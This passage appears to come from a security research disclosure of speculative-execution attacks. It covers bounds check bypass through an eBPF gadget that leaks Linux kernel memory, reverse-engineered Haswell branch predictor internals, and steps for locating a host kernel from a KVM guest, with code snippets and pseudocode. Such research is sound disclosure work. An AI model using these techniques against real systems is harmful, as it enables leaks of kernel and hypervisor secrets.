  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.

Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}

However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300, which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
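The encode and decode halves of this one-bit channel can be written down without any timing code. In the sketch below, probe_index repeats the victim's arithmetic, and decode_leaked_bit is a hypothetical attacker-side helper that takes the outcome of the two timing measurements as booleans; how those booleans are obtained (the actual cache timing) is deliberately left out.

```c
#include <stdbool.h>
#include <stddef.h>

/* Victim side: bit 0 of the out-of-bounds byte selects which slot of
 * arr2->data gets pulled into the cache (0x200 or 0x300). */
static size_t probe_index(unsigned char value)
{
    return ((size_t)(value & 1) * 0x100) + 0x200;
}

/* Attacker side: given which of the two slots loaded quickly, recover
 * the leaked bit. Returns -1 if the measurement is inconclusive
 * (both slots cached, or neither). */
static int decode_leaked_bit(bool slot_0x200_cached, bool slot_0x300_cached)
{
    if (slot_0x200_cached == slot_0x300_cached)
        return -1;
    return slot_0x300_cached ? 1 : 0;
}
```

An inconclusive result simply means the attempt has to be repeated, for instance because the branch was not mispredicted that time.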

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel has supported eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).
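To make the false-sharing argument concrete, the following sketch checks whether two fields of a structure fall into the same cache line. Everything here is an assumption for illustration: struct demo_map is a hypothetical stand-in and not the kernel's actual eBPF array layout, the line size is taken to be 64 bytes, and the object is assumed to start on a cache line boundary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define CACHE_LINE_SIZE 64u  /* assumption: 64-byte cache lines */

/* Hypothetical stand-in for an array object whose reference counter
 * and length sit next to each other. Not the kernel's real struct. */
struct demo_map {
    uint32_t refcnt;
    uint32_t length;
    unsigned char data[];
};

/* True if two byte offsets into a cache-line-aligned object land in
 * the same cache line. */
static bool share_cache_line(size_t off_a, size_t off_b)
{
    return off_a / CACHE_LINE_SIZE == off_b / CACHE_LINE_SIZE;
}
```

When the check holds for the reference counter and the length, a write to the counter on one core also delays reads of the length on other cores, which is the effect the attack relies on.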

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area has to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.
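The sizes involved can be double-checked with a little arithmetic. The sketch below assumes 4 KiB pages (the text does not state the page size explicitly); the macro and function names are illustrative.

```c
#include <stdint.h>

#define PAGE_SIZE_BYTES   (UINT64_C(1) << 12)  /* assumption: 4 KiB pages */
#define PAGES_PER_MAPPING (UINT64_C(1) << 4)   /* 2^4 pages per mapping */
#define MAPPING_COUNT     (UINT64_C(1) << 15)  /* 2^15 adjacent mappings */

/* Size of one mapping in bytes: 2^4 pages of 2^12 bytes = 2^16. */
static uint64_t mapping_bytes(void)
{
    return PAGES_PER_MAPPING * PAGE_SIZE_BYTES;
}

/* Size of the whole user_mapping_area: 2^15 * 2^16 = 2^31 bytes. */
static uint64_t total_area_bytes(void)
{
    return MAPPING_COUNT * mapping_bytes();
}

/* All mappings alias the same physical pages, so a hit anywhere in the
 * area shows up at this offset inside the first mapping. */
static uint64_t offset_in_mapping(uint64_t area_offset)
{
    return area_offset % mapping_bytes();
}
```

This is why only the first 2^4 pages need to be probed after each guess: whichever mapping the speculative access landed in, it touches the same physical page as the corresponding page of the first mapping.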

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.
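Putting the pieces together: with 33 upper bits and 16 lower bits known, 64 - 33 - 16 = 15 bits remain for the bisection step. The helper below is a hypothetical illustration of how the three parts combine into one 64-bit value; it is not taken from the PoC.

```c
#include <stdint.h>

#define LOW_BITS 16  /* offset inside one 2^16-byte mapping */
#define MID_BITS 15  /* bits recovered by bisection: 64 - 33 - 16 */

/* Combine the three recovered parts into a 64-bit value.
 * hi33:  upper 33 bits, from the address guess that produced the hit
 * mid15: middle 15 bits, from bisecting the remaining search space
 * low16: lower 16 bits, from the offset of the hit inside the mapping */
static uint64_t compose_address(uint64_t hi33, uint64_t mid15, uint64_t low16)
{
    uint64_t mid_mask = (UINT64_C(1) << MID_BITS) - 1;
    uint64_t low_mask = (UINT64_C(1) << LOW_BITS) - 1;
    return (hi33 << (LOW_BITS + MID_BITS))
         | ((mid15 & mid_mask) << LOW_BITS)
         | (low16 & low_mask);
}
```

Since each bisection round halves the search space, the 15 middle bits take 15 rounds to recover.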

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_map, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.
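The index computation from the pseudocode can be exercised on its own in plain C. The function below copies the expression verbatim; the parameter names match the pseudocode except for base, which is shorthand for prog_array_base_offset.

```c
#include <stdint.h>

/* Select one bit of secret_data, move it to bit 7, and add the base
 * offset. The result is either base or base + 128. */
static uint64_t progmap_index(uint64_t secret_data, uint64_t bitmask,
                              uint64_t bitshift_selector, uint64_t base)
{
    return (((secret_data & bitmask) >> bitshift_selector) << 7) + base;
}
```

To leak bit 5 of a value, for instance, bitmask would be 1 << 5 and bitshift_selector would be 5: a value with bit 5 clear yields base, and a value with bit 5 set yields base + 0x80.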

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.
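The example addresses can be reproduced with a deliberately simplified model: the lookup uses only the low 31 bits of the source, and the predicted target takes its upper half from the source address and its lower half from the stored entry. This is a sketch of the observed behavior only. It ignores the XOR folding and the boundary-crossing case, and the function names are made up.

```c
#include <stdint.h>

#define LOW32 UINT64_C(0xffffffff)

/* The part of the source address the generic predictor looks at:
 * the low 31 bits of the address of the last byte of the instruction. */
static uint32_t btb_source_bits(uint64_t src)
{
    return (uint32_t)(src & UINT64_C(0x7fffffff));
}

/* Simplified prediction: upper 32 bits follow the source address,
 * lower 32 bits come from the stored target. */
static uint64_t predicted_target(uint64_t src, uint64_t stored_target)
{
    return (src & ~LOW32) | (stored_target & LOW32);
}
```

With an entry trained by the jump from 0x4141.0004.1000 to 0x4141.0004.5123, a lookup from 0x4242.0004.1000 sees the same source bits and yields 0x4242.0004.5123 in this model.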

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A          bit B
0x40.0000      0x2000
0x80.0000      0x4000
0x100.0000     0x8000
0x200.0000     0x1.0000
0x400.0000     0x2.0000
0x800.0000     0x4.0000
0x2000.0000    0x10.0000
0x4000.0000    0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
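One way to check the aliasing examples is to reduce each source address to a canonical key: whenever bit A of a row is set, clear it and toggle the matching bit B. Two addresses then alias exactly when their keys are equal. The canonical-key construction is just a convenient way to model the XOR folding in software, not a claim about how the hardware computes it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct fold_pair { uint32_t a, b; };

/* The (bit A, bit B) rows of the folding table. */
static const struct fold_pair FOLD_TABLE[] = {
    { 0x00400000, 0x00002000 },
    { 0x00800000, 0x00004000 },
    { 0x01000000, 0x00008000 },
    { 0x02000000, 0x00010000 },
    { 0x04000000, 0x00020000 },
    { 0x08000000, 0x00040000 },
    { 0x20000000, 0x00100000 },
    { 0x40000000, 0x00200000 },
};

/* Fold the low 31 bits of a source address into a canonical key:
 * each set bit A is cleared and XORed into its partner bit B. */
static uint32_t fold_source(uint64_t src)
{
    uint32_t key = (uint32_t)(src & UINT64_C(0x7fffffff));
    for (size_t i = 0; i < sizeof FOLD_TABLE / sizeof FOLD_TABLE[0]; i++) {
        if (key & FOLD_TABLE[i].a)
            key ^= FOLD_TABLE[i].a | FOLD_TABLE[i].b;
    }
    return key;
}

/* Two source addresses are aliased if they fold to the same key. */
static bool aliased(uint64_t x, uint64_t y)
{
    return fold_source(x) == fold_source(y);
}
```

The four example pairs from the text come out as expected: 0x100.0000 aliases with 0x140.2000 and with 0x180.4000, but not with 0x180.0000 or 0x180.8000.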

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 - 2);
 *bhb_state ^= (src & 0xc000) >> (14 - 4);
 *bhb_state ^= (src & 0x30) << (6 - 4);
 *bhb_state ^= (src & 0x300) << (8 - 8);
 *bhb_state ^= (src & 0x3000) >> (12 - 10);
 *bhb_state ^= (src & 0x30000) >> (16 - 12);
 *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}
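Since C has no 58-bit integer type, a compilable version of the pseudocode has to emulate one. The sketch below keeps the state in a uint64_t and masks it to 58 bits after the shift; the BHB_MASK name and the masking approach are choices made here for illustration, while the XOR terms are copied from the pseudocode.

```c
#include <stdint.h>

#define BHB_MASK ((UINT64_C(1) << 58) - 1)  /* emulates a 58-bit state */

/* Shift the old history left by two bits, then XOR in 16 bits derived
 * from the source and destination of the taken branch. */
static void bhb_update(uint64_t *bhb_state, uint64_t src, uint64_t dst)
{
    uint64_t s = (*bhb_state << 2) & BHB_MASK;
    s ^= (dst & 0x3f);
    s ^= (src & 0xc0) >> 6;
    s ^= (src & 0xc00) >> (10 - 2);
    s ^= (src & 0xc000) >> (14 - 4);
    s ^= (src & 0x30) << (6 - 4);
    s ^= (src & 0x300) << (8 - 8);
    s ^= (src & 0x3000) >> (12 - 10);
    s ^= (src & 0x30000) >> (16 - 12);
    s ^= (src & 0xc0000) >> (18 - 14);
    *bhb_state = s;
}
```

Because every update shifts the state by two bits, a branch leaves the 58-bit state completely after 29 further updates, which is consistent with the BHB holding information about the last 29 taken branches.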

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this cannot cause information in bits that are already present in the history buffer to propagate downwards, and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
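
The shift-and-XOR hypothesis and the 2-bit shift measured above can be modelled in a few lines. This is only a sketch under stated assumptions, not the real update function: the 58-bit width (29 updates of 2 bits each) is an assumption, and `low_bits` models nothing but the two lowest bits, using the target bits 0x1/0x2 and source bits 0x40/0x80 named in the text. All function names are made up for illustration.

```python
BHB_BITS = 58                    # assumption: 29 branches x 2 bits per update
BHB_MASK = (1 << BHB_BITS) - 1
SHIFT = 2                        # per-insertion shift measured in the text


def low_bits(src: int, dst: int) -> int:
    """Hypothetical contribution of one taken branch to the two lowest bits.

    Target bits 0x1/0x2 and source bits 0x40/0x80 are XORed together, which
    is why flipping 0x1 in the target and 0x40 in the source cancels out.
    """
    return (dst & 0x3) ^ ((src >> 6) & 0x3)


def bhb_update(state: int, src: int, dst: int) -> int:
    """Left-shift the old history, then XOR in the new branch information."""
    return ((state << SHIFT) ^ low_bits(src, dst)) & BHB_MASK


def run(first_src: int, first_dst: int, filler_jumps: int) -> int:
    """One interesting branch followed by `filler_jumps` all-zero branches."""
    state = bhb_update(0, first_src, first_dst)
    for _ in range(filler_jumps):
        state = bhb_update(state, 0, 0)
    return state


base = run(0x1000, 0x2000, 28)
print(run(0x1000, 0x2001, 28) != base)   # flipping target bit 0x1 is visible
print(run(0x1040, 0x2001, 28) == base)   # unless source bit 0x40 flips as well
print(run(0x1000, 0x2001, 29) == run(0x1000, 0x2000, 29))  # 29 jumps erase it
```

In this model a single flipped bit survives 28 filler jumps in the top two bits of the state and disappears after the 29th, which is the behavior the experiment was probing for.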

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.
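
The two-bits-at-a-time recovery described above can be sketched as a simulation. The assumptions here are a 58-bit history buffer and an idealized oracle: `make_oracle` is a hypothetical stand-in for the real misprediction-rate measurement and simply reports whether the attacker-controlled history equals the history left over from the hypercall after N all-zero branches.

```python
import random

BHB_BITS = 58                      # assumption: 29 updates x 2 bits
MASK = (1 << BHB_BITS) - 1
TOP = BHB_BITS - 2                 # bit position 28*2 of the two unknown bits


def state_after_zero_branches(hidden: int, n: int) -> int:
    """History left after `n` branches that contribute only zero bits."""
    return (hidden << (2 * n)) & MASK


def make_oracle(hidden: int):
    """Stand-in for the timing measurement: True means the controlled history
    collides with the hypercall path, so mispredictions occur at a high rate."""
    def collides(n: int, controlled: int) -> bool:
        return controlled == state_after_zero_branches(hidden, n)
    return collides


def leak_bhb(collides) -> int:
    """Recover the history two bits at a time, for N = 28 down to 0."""
    known = 0                       # the history for N=29 is all zeroes
    for n in range(28, -1, -1):
        for guess in range(4):
            candidate = (guess << TOP) | (known >> 2)
            if collides(n, candidate):
                known = candidate
                break
        else:
            raise RuntimeError(f"no candidate matched for N={n}")
    return known


secret = random.getrandbits(BHB_BITS)
print(leak_bhb(make_oracle(secret)) == secret)
```

Each of the 29 rounds needs at most four measurements, so the whole state is recovered with at most 116 oracle queries in this model.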

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

